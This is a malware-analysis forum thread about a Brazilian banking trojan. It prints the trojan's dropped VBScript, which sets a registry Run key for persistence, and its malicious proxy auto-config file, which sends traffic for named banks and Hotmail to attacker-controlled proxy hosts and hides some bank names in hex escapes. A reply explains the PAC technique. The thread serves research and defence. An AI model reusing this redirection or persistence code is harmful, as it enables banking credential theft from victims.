A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #18684  by r3shl4k1sh
 Sun Mar 24, 2013 11:19 pm
I found this file few days ago, it is Banker according to VT https://www.virustotal.com/en/file/359b ... /analysis/

MD5: 4f68fc8ae042080a071a373dc54ef8b6
SH1: 359bdb0af9f84262cad461be389219ae062a3d699af51900cb3701086cde8620

This file is written using .NET (i assume), and after first run it copies itself to the user's Application Data directory.
In addition it drops the following 3 files in the user's Temp folder:

cc.vbs
Code: Select all
on error resume next
test = "winmgmts:{impersonationLevel=impersonate}//./root/default:StdRegProv"
Set objRegistry=GetObject(test)
strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Run"
strValueName = "ytf3shx9ppa"
strValue = """C:\Documents and Settings\Administrator\Application Data\VZ4qng1\KqHWnRl.exe"""
objRegistry.SetStringValue &H80000001,strKeyPath,strValueName,strValue
tfile.jsp
Code: Select all
function FindProxyForURL(url, host)
{
//IPS
var iphot = "PROXY hota.tudoecology.com";
var nbebe = "PROXY noturno.tudoecology.com";
var ipd = "PROXY noturno.tudoecology.com";
var bosta = "PROXY noturno.tudoecology.com";
var ipsanta = "PROXY noturno.tudoecology.com";
var ipciti = "PROXY noturno.tudoecology.com";
var ipita = "PROXY noturno.tudoecology.com";
var iphsbc = "PROXY noturno.tudoecology.com";
var ipbanese = "PROXY noturno.tudoecology.com";
var ipserasa = "PROXY noturno.tudoecology.com";
var ipsicredi = "PROXY noturno.tudoecology.com";
var ipintouch = "PROXY noturno.tudoecology.com";
var ipbnb = "PROXY noturno.tudoecology.com";
var ipbrb = "PROXY noturno.tudoecology.com";
//Banco do Brasil
var pos1 = "*\x62"+""+"\x62*";
var tuvoa2 = "*\x62\x61\x6e\x63\x6f\x64\x6f\x62\x72\x61\x73\x69\x6c*";
if (shExpMatch(host, pos1)) {
return nbebe;
}
if (shExpMatch(host, tuvoa2)) {
return nbebe;
}
// Banese
var ban1 = "*\x62\x61\x6e\x65\x73\x65*";
if (shExpMatch(host, ban1)) {
return ipbanese;
}
// Caixa Economica Federal
var cef1 = "*cef*";
var cef2 = "*caixa*";
if (shExpMatch(host, cef1)) {
return bosta;
}
if (shExpMatch(host, cef2)) {
return bosta;
}
//HSBC
var hsbc1 = "*hsbc*";
if (shExpMatch(host, hsbc1)) {
return iphsbc;
}
//Sicredi
var sic1 = "*sicredi*";
if (shExpMatch(host, sic1)) {
return ipsicredi;
}
//BNB
var bnb1 = "*bnb*";
if (shExpMatch(host, bnb1)) {
return ipbnb;
}
//Citibank
var muki1 = "*citibank*";
if (shExpMatch(host, muki1)) {
return ipciti;
}
//Intouch
var int1 = "*intouch*";
if (shExpMatch(host, int1)) {
return ipintouch;
}
//Serasa
var ostra1 = "*serasa*";
if (shExpMatch(host, ostra1)) {
return ipserasa;
}
//SecureSSL
var foca1 = "*\x62\x72\x61\x64\x65\x73\x63\x6f*";
var ita1 = "*\x69\x74\x61\x75*";
var ssl1 = "*securessl*";
if (shExpMatch(host, ssl1)) {
return google.com.br;
}
//Bradesco
if (shExpMatch(host, foca1)) {
return ipd;
}
//Itau
if (shExpMatch(host, ita1)) {
return ipita;
}
//HOTMAIL
var hot1 = "*hotmail*";
if (shExpMatch(host, hot1)) {
return iphot;
}
//SANTA
var santa1 = "*santa";
var santa2 = "nder*";
var santa3 = santa1 + santa2;
var santa4 = "*real*";
if (shExpMatch(host, santa3)) {
return ipsanta;
}
if (shExpMatch(host, santa4)) {
return ipsanta;
}
return "DIRECT";
}
systemfile.txt
Code: Select all
foi
As you can see in the vbs file it writes in the registry to be auto run.

I am trying to see this file in action, or at least make network activity but i am unable to do so.
Someone can give short explanation on what is the purpose of the jsp file? is this file injected in every page retrieved by the browser?


Edit: Attach file
Attachments
password: infected
(33.47 KiB) Downloaded 49 times
Last edited by EP_X0FF on Tue Mar 26, 2013 9:16 am, edited 1 time in total. Reason: renamed to be more descriptive
 #18687  by cjbi
 Mon Mar 25, 2013 10:36 am
r3shl4k1sh wrote:ISomeone can give short explanation on what is the purpose of the jsp file? is this file injected in every page retrieved by the browser?
It's a Proxy Auto Configuration (PAC) file.
A common technique used by a Brazilian banking malware.
PAC.gif
Internet Explorer LAN settings
PAC.gif (40.62 KiB) Viewed 457 times
More informations:
MSDN http://bit.ly/101rZ0C
Wikipedia http://en.wikipedia.org/wiki/Proxy_auto-config
FindProxyForURL http://findproxyforurl.com/example-pac-file/